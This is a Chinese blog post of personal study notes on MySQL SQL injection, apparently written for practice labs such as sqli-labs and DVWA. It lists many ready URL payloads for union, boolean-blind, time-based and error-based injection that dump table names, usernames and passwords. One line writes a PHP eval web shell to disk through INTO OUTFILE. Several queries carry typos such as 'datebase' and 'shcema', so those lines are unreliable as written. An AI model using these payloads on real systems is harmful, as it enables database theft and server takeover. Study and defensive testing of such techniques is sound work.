<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    <meta name="description" content="Hexo Theme Redefine">
    <meta name="author" content="y4ny4n">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-redefine.png">
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://y4ny4n.cn/2020/11/30/sql注入学习笔记/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    <meta property="og:type" content="article">
    <meta property="og:title" content="sql注入学习">
    <meta property="og:description" content="Hexo Theme Redefine">
    <meta property="og:url" content="https://y4ny4n.cn2020/11/30/sql注入学习笔记/">
    
    <meta property="og:site_name" content="y4ny4n&#39;s blog">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="sql注入学习">
    <meta name="twitter:description" content="Hexo Theme Redefine">
    <meta name="twitter:image" content="/images/logo1.png">
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/logo1.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/logo1.png">
    <meta name="theme-color" content="#005080">
    <link rel="shortcut icon" href="/images/logo1.png">
    
    <title>
        
            sql注入学习 -
        
        y4ny4n&#39;s blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/assets/fonts.css">

    
    
    
    <script id="hexo-configurations">
    let REDEFINE = window.REDEFINE || {};
    REDEFINE.hexo_config = {"hostname":"y4ny4n.cn","root":"/","language":"zh-CN"};
    REDEFINE.theme_config = {"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true},"style":{"primary_color":"#005080","avatar":"/images/y4ny4n.jpg","favicon":"/images/logo1.png","og_image":{"enable":false,"image_url":null},"article_img_align":"center","right_side_width":"210px","content_max_width":"1000px","nav_color":{"left":"#f78736","right":"#367df7","transparency":35},"hover":{"shadow":true,"scale":false},"first_screen":{"enable":true,"background_image":{"light":"/images/back_evol/星星软糖[1].jpg","dark":"/images/back_evol/羁影[1].jpg"},"title_color":{"light":"#fff","dark":"#fff"},"description":"Let me think that there is one among those stars that guides my life through the dark unknown.","custom_font":{"enable":false,"font_family":null,"font_url":null}},"scroll":{"progress_bar":{"enable":true},"percent":{"enable":false}}},"local_search":{"enable":false,"preload":true},"code_block":{"copy":true,"style":"mac","custom_font":{"enable":false,"font_family":null,"font_url":null}},"pjax":{"enable":true},"lazyload":{"enable":true},"version":"1.2.0","friend_links":{"columns":2},"home_article":{"date_format":"auto","category":{"enable":true,"limit":3},"tag":{"enable":true,"limit":3}},"plugins":{"aplayer":{"enable":false,"audio":[{"name":null,"artist":null,"url":null,"cover":null},{"name":null,"artist":null,"url":null,"cover":null}]}}};
    REDEFINE.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
  </script>
    
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="menu-wrapper">
    
    <div class="menu-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                y4ny4n&#39;s blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="pc">
                <ul class="menu-list">
                    
                        
                            <li class="menu-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                        首页
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="menu-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/archives"  >
                                    
                                        
                                        归档
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="menu-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/categories"  >
                                    
                                        
                                        分类
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="menu-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/tags"  >
                                    
                                        
                                        标签
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="menu-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/about"  >
                                    
                                        
                                        关于
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="menu-drawer">
        <ul class="drawer-menu-list">
            
                
                    <li class="drawer-menu-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                首页
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-menu-item flex-center">
                        <a class="" 
                        href="/archives"  >
                             
                                
                                归档
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-menu-item flex-center">
                        <a class="" 
                        href="/categories"  >
                             
                                
                                分类
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-menu-item flex-center">
                        <a class="" 
                        href="/tags"  >
                             
                                
                                标签
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-menu-item flex-center">
                        <a class="" 
                        href="/about"  >
                             
                                
                                关于
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
            
                <div class="article-title">
                    <h1 class="article-title-regular">sql注入学习</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="/images/y4ny4n.jpg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">y4ny4n</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="pc">2020-11-30 22:08:45</span>
        <span class="mobile">2020-11-30 22:08</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="pc">2021-11-06 21:06:20</span>
            <span class="mobile">2021-11-06 21:06</span>
            <span class="hover-info">更新</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/sql%E6%B3%A8%E5%85%A5/">sql注入</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fa-regular fa-file-word"></i>&nbsp;<span>5.6k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fa-regular fa-clock"></i>&nbsp;<span>23 分钟</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <p>sql注入学习笔记，感谢好朋友月夜见提供的学习资料。包含union注入、布尔盲注、时间盲注、报错注入、堆叠注入、二次注入、宽字节注入、UserAgent/Referer/Cookie注入、sqlmap的使用…</p>
<a id="more"></a>
<h2 id="14-SQL注入原理"><a href="#14-SQL注入原理" class="headerlink" title="14 SQL注入原理"></a>14 SQL注入原理</h2><h3 id="OWASP-top10"><a href="#OWASP-top10" class="headerlink" title="OWASP top10"></a>OWASP top10</h3><h3 id="什么是SQL注入"><a href="#什么是SQL注入" class="headerlink" title="什么是SQL注入"></a>什么是SQL注入</h3><ul>
<li><p>sql：结构化查询语言</p>
</li>
<li><p>应用系统使用sql管理数据库，采用<strong>拼接</strong> 的方式形成一条完整的数据库语言</p>
</li>
<li><p>把sql命令插入到<strong>web表单</strong>或<strong>输入域名页面请求</strong>的查询字符串</p>
</li>
</ul>
<h3 id="数据库基础"><a href="#数据库基础" class="headerlink" title="数据库基础"></a>数据库基础</h3><h4 id="mysql"><a href="#mysql" class="headerlink" title="mysql"></a>mysql</h4><h5 id="什么是数据库"><a href="#什么是数据库" class="headerlink" title="什么是数据库"></a>什么是数据库</h5><h6 id="关系型数据库管理系统（RDBMS）"><a href="#关系型数据库管理系统（RDBMS）" class="headerlink" title="关系型数据库管理系统（RDBMS）"></a>关系型数据库管理系统（RDBMS）</h6><p>关系型数据库，是建立在关系模型基础上的数据库，借助于集合代数等数学概念和方法来处理数据库中的数据。</p>
<p>RDBMS 的特点：</p>
<ul>
<li>1.数据以表格的形式出现</li>
<li>2.每行为各种记录名称</li>
<li>3.每列为记录名称所对应的数据域</li>
<li>4.许多的行和列组成一张表单</li>
<li>5.若干的表单组成database</li>
</ul>
<p><img src="/2020/11/30/sql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/image-20200324111143839.png" alt="image-20200324111143839"></p>
<h5 id="数据库基础-1"><a href="#数据库基础-1" class="headerlink" title="数据库基础"></a>数据库基础</h5><h6 id="常用数据库查询语句"><a href="#常用数据库查询语句" class="headerlink" title="常用数据库查询语句"></a>常用数据库查询语句</h6><ul>
<li>create datebase   创建数据库<strong>数据库名字不能使用全数字</strong></li>
<li>drop database </li>
<li>show databases</li>
<li>select databses() 当前的数据库名</li>
</ul>
<p>使用一个数据库 use 数据库名；</p>
<p><a href="https://www.runoob.com/mysql" target="_blank" rel="noopener">https://www.runoob.com/mysql</a></p>
<h6 id="常用数据库内置变量"><a href="#常用数据库内置变量" class="headerlink" title="常用数据库内置变量"></a>常用数据库内置变量</h6><ul>
<li><p>version() 查询数据库版本</p>
<p>@@version 效果等同</p>
</li>
<li><p>user() 数据库运行的用户</p>
</li>
<li><p>datebase() 数据库名</p>
</li>
</ul>
<p>相当于在命令行下执行 select version()</p>
<h2 id="15、16-mysql注入常见函数"><a href="#15、16-mysql注入常见函数" class="headerlink" title="15、16   mysql注入常见函数"></a>15、16   mysql注入常见函数</h2><p>1.字符串链接函数</p>
<ul>
<li>concat 链接多个字符串 </li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select concat(name,&#39;|&#39;,email,&#39;|&#39;,passwprd) from users;</span><br><span class="line">#若字符串查询内容中有一个为空，则整体为空</span><br></pre></td></tr></table></figure>
<ul>
<li>concat_ws</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select concat_ws(&#39;|&#39;,name.email,password) from users;</span><br><span class="line">#不会整体为空，第一个参数为分隔符，如果第一个参数为空，则整体为空</span><br></pre></td></tr></table></figure>
<ul>
<li><p>group_concat</p>
<p>把字段里的内容一起显示，限制：查询出来的结果的长度默认是1024</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select group_concat(username) from users;</span><br></pre></td></tr></table></figure>
<p>​            可以进行联合使用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select group_concat(concat_ws(&#39;|&#39;,username,id)) from users;</span><br></pre></td></tr></table></figure>
<p>2.字符串截取函数</p>
<p>所有函数操作数从1开始而不是从0开始，除limit外</p>
<ul>
<li>substring</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select substring((select username from users limit 0,1)，1，2)</span><br><span class="line">#substring第一个参数 查询的结果字符串，第二个参数 从什么地方开始截取，第三个参数 长度是多少</span><br><span class="line">#limit 如果给定两个参数，第一个参数指定第一个返回记录行的偏移量，第二个参数指定返回记录行的最大数目</span><br></pre></td></tr></table></figure>
<p>substr也可以代替使用</p>
<ul>
<li>mid</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select mid(&#39;test123&#39;,2,3)</span><br><span class="line">&gt;est</span><br></pre></td></tr></table></figure>
<ul>
<li><p>left</p>
<p>从左开始截取长度为3，right函数相反</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">select left(&#39;test123&#39;,3)</span><br><span class="line">&gt;tes</span><br><span class="line">select right(&#39;test123&#39;,3)</span><br><span class="line">&gt;123</span><br></pre></td></tr></table></figure>
<ul>
<li><p>locate</p>
<p>返回第一个参数字符串在第二个参数中第一次出现的位置</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select locate(‘123test123&#39;,&#39;as123test123&#39;)</span><br><span class="line">&gt;3</span><br></pre></td></tr></table></figure>
<p>3.返回指定的ASCII字符对应的数值</p>
<ul>
<li><p>ascii </p>
<p>只有一个参数，需要转换的</p>
<p>ord与ascii用法相同</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select ascii(&#39;a&#39;);</span><br><span class="line">&gt;97</span><br><span class="line">select ascii(substring((select username from users limit 0,1),2,1));</span><br></pre></td></tr></table></figure>
<p>4.返回指定数字对应的ascii字符</p>
<ul>
<li>char</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select char(97);</span><br><span class="line">&gt;a</span><br></pre></td></tr></table></figure>
<p>5.字符串替换</p>
<ul>
<li><p>replace</p>
<p>把username字段里的zangsan sds替换为了hh</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select replace((select  username from users limit 0,1),&#39;zangsan sds&#39;,&#39;hh&#39;)</span><br></pre></td></tr></table></figure>
<p>6.计算长度</p>
<ul>
<li>length</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select length(&#39;hahshdk&#39;);</span><br><span class="line">&gt;7</span><br></pre></td></tr></table></figure>
<ul>
<li><p>count</p>
<p>记录某个表下有多少记录</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select count(*) from users;</span><br></pre></td></tr></table></figure>
<p>7.时间盲注会用到的函数</p>
<p>sleep、if</p>
<ul>
<li><p>sleep</p>
<p>使输出结果延迟了10s</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users union select 1,2,sleep(10);</span><br></pre></td></tr></table></figure>
<p>8.读写文件函数</p>
<p>写文件</p>
<p>into outfile </p>
<p>把一句话木马写入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &quot;&lt;?php@eval($_POST[&#39;mm&#39;?])&gt;&quot; into outfile &quot;d:&#x2F;shell.php&quot;</span><br></pre></td></tr></table></figure>
<p>一般路径是网站的根路径</p>
<p>into dumpfile(读取二进制文件)</p>
<p>读文件</p>
<p>load_file()</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select load_file(&#39;d:&#x2F;shell.php&#39;)</span><br></pre></td></tr></table></figure>
<p>9.注释方法</p>
<ul>
<li>#</li>
<li>/— -</li>
<li>— +</li>
<li>/**/</li>
<li>/<em> ! </em> /</li>
<li>/<em>!50000 </em>/ mysql5通用，带版本内联注释</li>
</ul>
<h2 id="17-18information-schema相关"><a href="#17-18information-schema相关" class="headerlink" title="17 18information_schema相关"></a>17 18information_schema相关</h2><p>information_schema(mysql 5.0以上的版本才存在)</p>
<p>在MySQL中，把information_schema看作是一个数据库，确切地说是信息数据库，其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。</p>
<p><a href="https://www.cnblogs.com/shengdimaya/p/6920677.html" target="_blank" rel="noopener">https://www.cnblogs.com/shengdimaya/p/6920677.html</a></p>
<p>SCHEMATA表：提供了当前mysql实例中所有数据库的信息。是show databases结果取于此表</p>
<p>TABLES表：提供了关于数据库中所有的表的信息。详细描述了某个表属于哪个schema，表类型，表引擎，创建时间等信息。是show tables from schemaname(数据库名)的结果取之此表。</p>
<p>COLUMNS表：所有数据库所包含的所有表的列名信息以及每个列的信息。是show columns from schemaname.tablename 的结果取之此表。</p>
<h3 id="information-schema在mysql注入中的运用"><a href="#information-schema在mysql注入中的运用" class="headerlink" title="information_schema在mysql注入中的运用"></a>information_schema在mysql注入中的运用</h3><p>先查询出mysql版本</p>
<h2 id="19-、20-union注入"><a href="#19-、20-union注入" class="headerlink" title="19 、20 union注入"></a>19 、20 union注入</h2><p>实验环境搭建：dvwa sqli-labs</p>
<h3 id="基于union的注入"><a href="#基于union的注入" class="headerlink" title="基于union的注入"></a>基于union的注入</h3><p>?后表示通过get方式传递的参数</p>
<p>order by判断当前查询表里的字段</p>
<p>?id=1 union select 1,2,3</p>
<p>?id=0(查询不到，执行后面的查询) union select 1,2,3</p>
<p>  1,2,3为三个字段用于占位，可以更改为想要查询内容你的对应函数</p>
<h6 id="获取对应表"><a href="#获取对应表" class="headerlink" title="获取对应表"></a>获取对应表</h6><p>?id=0 union select 1,database(),table_name from information_schema.tables where table_schema=’test’</p>
<p>>test:users</p>
<h6 id="查询列"><a href="#查询列" class="headerlink" title="查询列"></a>查询列</h6><p>?id=0 union select 1,database(),column_name from information_schema.columns where table_schema=’test’ and table_name=’users’</p>
<p>>test:id</p>
<p>但列名不止id一个字段</p>
<p>?id=0 union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=’test’ and table_name=’users’</p>
<p>查询出所有列名</p>
<p>如果只能看一个就可通过limit进行查阅</p>
<p>?id=0 union select 1,database(),column_name from information_schema.columns where table_schema=’test’ and table_name=’users’ limit 1,1</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> tableName <span class="keyword">limit</span> i,n</span><br><span class="line"><span class="comment"># tableName：表名</span></span><br><span class="line"><span class="comment"># i：为查询结果的索引值(默认从0开始)，当i=0时可省略i</span></span><br><span class="line"><span class="comment"># n：为查询结果返回的数量</span></span><br><span class="line"><span class="comment"># i与n之间使用英文逗号","隔开</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># </span></span><br><span class="line"><span class="keyword">limit</span> n 等同于 <span class="keyword">limit</span> <span class="number">0</span>,n</span><br></pre></td></tr></table></figure>
<h6 id="获取数据"><a href="#获取数据" class="headerlink" title="获取数据"></a>获取数据</h6><p>?id=0 union select 1,database(),username from users limit 0,1 //或使用group_concat()</p>
<h3 id="具体操作"><a href="#具体操作" class="headerlink" title="具体操作"></a>具体操作</h3><p>判断是否存在sql注入</p>
<ul>
<li><p>通过单引号进行查找 </p>
<p>？id=114’</p>
<p>单引号破坏了原来sql语句的语法，并报错。确定114’被采用拼接方式带入了数据库执行</p>
<p>—+注释掉后面的单引号 +在url中是空格的意思</p>
</li>
<li><p>当加减法对页面没有影响时，说明不是数字型的注入</p>
</li>
<li><p>通过sleep判断sql注入是否存在</p>
<p>?id=114 and sleep(10)</p>
<p>通过f12查询所需时间发现没有影响，说明可能把114后内容舍弃了</p>
</li>
</ul>
<p>确定注入字段数</p>
<ul>
<li>通过order by </li>
<li>?id=114’order by +字段数</li>
</ul>
<p>联合查询</p>
<ul>
<li><p>通过编码方式绕过关键字过滤</p>
</li>
<li><p>查询数据库版本 5.0以下不能使用information_schema</p>
</li>
<li><p>查找出当前数据库</p>
</li>
<li><p>查找出所有表</p>
<p>?id=114’ union select 1,2,table_name,4,5,6 from information_schema.tables where table_schema=’interali_project’—+</p>
<p>可以通过group_concat将查询结果连接在一起</p>
</li>
<li><p>获取相关表的字段名</p>
<p>?id=114’ union select 1,2,column_name,4,5,6 from information_schema columns where table_schema=’interali_project’ and table_name=’usertable’—+</p>
</li>
<li><p>获取字段下的数据</p>
<p>?id=114’ union select 1,2,username,4,5,6 from usertable—+</p>
</li>
</ul>
<h2 id="21-、22-布尔盲注"><a href="#21-、22-布尔盲注" class="headerlink" title="21 、22 布尔盲注"></a>21 、22 布尔盲注</h2><h3 id="手工注入过程"><a href="#手工注入过程" class="headerlink" title="手工注入过程"></a>手工注入过程</h3><p>1.获取数据库名字长度</p>
<p>?id=1’ and (length(datebase()))—+</p>
<p>?id=1’ and (length(database()))&gt;5—+</p>
<p>2.获取数据库名字</p>
<p>?id=1’ and ascii(substr(database(),1,1))&gt;100—+</p>
<p>//排序除limit外，都从1开始</p>
<p>使用burp的intruder模块遍历</p>
<p>3.获取表的数量</p>
<p>?id=1’ and (select count(*) from information_schema.tables where table_schema=database())&gt;5—+</p>
<p>4.获取表名的长度</p>
<p>?id=1’ and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1//只获取第一个表名)&gt;5—+</p>
<p>通过limit获取每张表表名的长度</p>
<p>5.获取表的名字</p>
<p>?id=1’ and (select ascii(substr(table_name,1,1) from information_schema.tables where table_shcema=database() limit 0,1)&gt;100—+ </p>
<p>6.获取列名的数量</p>
<p>?id=1’ and (select count(column_name) from information_schema.columns  where table_schema=databse() and table_name=’emails’)&gt;5—+</p>
<p>7.获取列名的长度</p>
<p>?id =1’ and (select length(column_name) from information_schema.columns where table_schema=database() and table_name=’emails’ limit 0,1)&gt;2—+</p>
<p>8.获取列的名字</p>
<p>?id=1’ and (select ascii(substr(column_name,1,1)) from information_schema.columns where table_schema=database() and table_name=’emails’ limit 0,1)&gt;100—+</p>
<p>9.获取表中的数据</p>
<p>获取数据</p>
<p>?id=1’ and ascii(substr((select id from emails limit 0,1),1,1))=49—+</p>
<p>?id=1’ and ascii(substr((select id from emails limit 1,1),1,1))=50—+</p>
<p>…….</p>
<h3 id="使用burpsuite"><a href="#使用burpsuite" class="headerlink" title="使用burpsuite"></a>使用burpsuite</h3><p>进行抓包-&gt; Intruder-&gt;Positions(目标)-&gt;Sniper(狙击模式)-&gt;clear 去掉默认加的变量符-&gt;把需要猜测的ascii值加上变量符 $114$ -&gt;设置Payload payload set=1 payload type=Numbers -&gt;选择sequential(顺序)或random,from 0 to 127,step=1-&gt;start</p>
<p>最好使用等于号，而不是大于号小于号，使结果一目了然，只有一个</p>
<h2 id="23-时间盲注"><a href="#23-时间盲注" class="headerlink" title="23  时间盲注"></a>23  时间盲注</h2><p>通过时间变化判断sql语句是否被成功地执行</p>
<h3 id="判断id数据类型成功执行sql语句"><a href="#判断id数据类型成功执行sql语句" class="headerlink" title="判断id数据类型成功执行sql语句"></a>判断id数据类型成功执行sql语句</h3><p>?id=1’ and sleep(10)—+</p>
<p>加载10s以上  查看方法:f12-&gt;Network 看到整个请求完成的时间</p>
<p>假设id是数字型 ?id=1 and if(1=1,sleep(5),1)//若1=1，sleep(5);else,返回1</p>
<p>没有延时，假设是字符型</p>
<p>?id=1’ and if(1=1,sleep(5),1)—+//若1=1，sleep(5);else</p>
<p>有延时，说明id是字符型</p>
<h3 id="进行盲注"><a href="#进行盲注" class="headerlink" title="进行盲注"></a>进行盲注</h3><p>示例:?id=1’ and if(&gt;123,sleep(5),1)—+</p>
<p>获取数据库版本号</p>
<p>?id=1’ and if(ascii(mid((select version()),1,1//字符串截取函数,类似于substr))&gt;50),sleep(5),1)—+ </p>
<p>?id=1’ and if(ascii(mid((select table_name from information_schema.tables),1,1))&gt;50),sleep(5),1)—+ </p>
<h2 id="24-floor报错注入原理"><a href="#24-floor报错注入原理" class="headerlink" title="24 floor报错注入原理"></a>24 floor报错注入原理</h2><p>十种MySQL报错注入</p>
<h3 id="原理分析"><a href="#原理分析" class="headerlink" title="原理分析"></a>原理分析</h3><p>1.rand()产生伪随机数的数列 随机产生0-1中间的数</p>
<p>rand(seed)</p>
<p>2.count(*)</p>
<p>select count(*) from floortest 查询表下有多少列</p>
<p>3.group by 分组</p>
<p>select * from floortest group by name</p>
<p>以name列为基准分组 name下重复的归到一组</p>
<p>select count(*),name from floortest group by name</p>
<p>4.floor()</p>
<p>向下取整  floor(2.99) -&gt; 2</p>
<p> rand(0) seed=0 整条语句结果是固定的随机数</p>
<p>select floor(rand(0)*2);  -&gt; 0</p>
<p>select floor(rand(0)*2) from floortest; -&gt;产生0和1两种结果</p>
<p>5.count(*)+group by创建虚拟表</p>
<p>会根据数据的需要，临时建立一个虚拟表，来进行计数</p>
<div class="table-container">
<table>
<thead>
<tr>
<th>key</th>
<th>count（*）</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td></td>
</tr>
<tr>
<td>1</td>
<td>1</td>
</tr>
<tr>
<td>0</td>
<td>1</td>
</tr>
</tbody>
</table>
</div>
<p>查询时 先查询表中key有无此数据，若没有，插入这个数据；若有，+1</p>
<p>第一个数为0  查询虚拟表中没有 插入floor(rand(0)*2) 语句再执行一次 变为1 所以插入key=1</p>
<p>第二个数为1 查询表中有1 count=1+1</p>
<p>第三个数为0 查询虚拟表中没有 插入floor(rand(0)*2) 又变为1 </p>
<p>此时报错 Duplicate entry’1’ for key’group_key’</p>
<p> //键’group_key’的重复条目’1’</p>
<p>select count(<em>),concat(user(),floor(rand(0)\</em> 2)) from floortest group by concat(user(),floor(rand(0)*2))</p>
<p>select count(<em>),concat(user(),floor(rand(0)\</em>2))x from floortest group by x  //给concat(user(),floor(rand(0)*2))设置别名x，直接用x代表</p>
<p>若不知道表名可以使用</p>
<p>select count(<em>),concat(user(),floor(rand(0)\</em>2))x from information_schema.tables group by x</p>
<p>由于上面的语句查询出来的结果是一张表，必须将其变为具体数值(true false)才能与and进行操作，只能是布尔值，需要在嵌套一次查询</p>
<p>select <em> from floortest where id=1 and **(select 1 from(select count(</em>),concat(user(),floor(rand(0)*2))) x from information_schema.tables group by x)a);**</p>
<p>需要给(select count(<em>),concat(user(),floor(rand(0)\</em>2))) x from information_schema.tables group by x)表添加一个别名a</p>
<h2 id="25-floor报错注入利用演示"><a href="#25-floor报错注入利用演示" class="headerlink" title="25 floor报错注入利用演示"></a>25 floor报错注入利用演示</h2><p>查询数据库名</p>
<p>?id=1’) and(select 1 from(select count(*),concat( database(),floor(rand(0)*2))a from information_schema.tables group by a)x)—+</p>
<p>>‘security1’</p>
<p>查询表名</p>
<p>?id=1’) and (select 1 from(select count(<em>),concat(==(select table_name from information_schema.tables where table_schema=’security’ limit 0,1)==，floor(rand(0)\</em>2))a from information_schema.tables group by a)x)—+</p>
<p>查询列名</p>
<p>?id=1’) and (select 1 from(select count(<em>),concat(==(select column_name from information_shcema.columns where table_schema=’security’ and table_name=’users’ limit 0,1)==，floor(rand(0)\</em>2))a from information_schema.tables group by a)x)—+</p>
<p>查询到两列 username和password</p>
<p>查询数据</p>
<p>?id=1’) and (select 1 from(select count(<em>),concat(==(select username from users  limit 0,1)==，floor(rand(0)\</em>2))a from information_schema.tables group by a)x)—+</p>
<p>?id=1’) and (select 1 from(select count(<em>),concat(==(select password from users  limit 0,1)==，floor(rand(0)\</em>2))a from information_schema.tables group by a)x)—+</p>
<h2 id="26-extractvalue-和updatexml-报错注入"><a href="#26-extractvalue-和updatexml-报错注入" class="headerlink" title="26 extractvalue()和updatexml()报错注入"></a>26 extractvalue()和updatexml()报错注入</h2><h3 id="报错原理"><a href="#报错原理" class="headerlink" title="报错原理"></a>报错原理</h3><p>extractvalue()有两个参数</p>
<p>updatexml()有三个参数</p>
<p>两个函数都是在第二个位置的参数上进行修改注入</p>
<p>这两个函数都是用来处理xml文档的</p>
<p>报错都是xml语法错误</p>
<p>只要两个函数的第二个参数不符合xml语法，就会发生报错</p>
<p>?id=1’ and (updatexml(1,concat(0x7e,(select database()),0x7e),1))—+</p>
<p>?id=1’ and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’security ‘ limit 0,1),0x7e),1))—+</p>
<p>通过两个函数查询时需注意：查询数据长度限制在32位之内，如果超过32位</p>
<p>可以使用left() right() substr() 通过截取长度分段显示出来</p>
